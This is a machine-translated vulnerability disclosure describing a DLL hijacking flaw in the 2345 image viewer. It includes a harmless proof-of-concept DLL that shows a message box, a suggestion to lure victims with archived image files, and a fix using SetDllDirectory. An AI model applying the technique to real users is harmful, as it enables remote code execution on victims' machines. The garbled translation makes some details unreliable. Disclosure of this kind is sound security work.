2345 view tuwang's Remote Code Execution Vulnerability (with vulnerability POC)

2345 view tuwang's Remote Code Execution Vulnerability (with vulnerability POC)

2345 view the Remote Code Execution Vulnerability of tuwang.
(Young man, I think you are surprised by the bones. This amazing photo is for you for free)

Detailed description:

The 2345picviewer.exe process will try to load QuserEx in the same directory as the image. dll file, the image file and malicious QuserEx. the dll file is placed in the same directory, which can cause remote code execution (packaged and sent to the victim with various eye-catching titles, and the victim will be recruited after being unzipped ).

Proof of vulnerability:

First download the latest version of 2345 to view tuwang. The latest version on the official website is April 9, August 27, 2015, as shown below:

Now we need to compile a QuserEx. dll file. The Code is as follows (a dialog box is displayed to prove that the DLL can be loaded ):

#include 
 
  BOOL WINAPI DllMain(    HINSTANCE hinstDLL,    DWORD fdwReason,    LPVOID lpReserved ) {    switch( fdwReason )     {     case DLL_PROCESS_ATTACH:        MessageBoxA(            NULL,             "DLL hijacking vulnerability detected.",             "2345",             MB_ICONWARNING);        break;    case DLL_THREAD_ATTACH:        break;    case DLL_THREAD_DETACH:        break;    case DLL_PROCESS_DETACH:        break;    }    return TRUE;}
 

After compilation, the name is changed to quserex.dll. then, you can find an image, for example, windows8.png. We put quserex.dlland windows8.png in any folder, for example, all in the D: \ Test folder.
After confirming that the file format is PNG, the figure above shows that the DLL is successfully loaded, as shown in the following figure:

We can use Process assumerto confirm that the dllis in the 2345picviewer.exe Process, as shown in:
 

Proof complete!

Solution:

Call SetDllDirectory ("") in the 2345picviewer.exe process to set the current DLL search directory to null.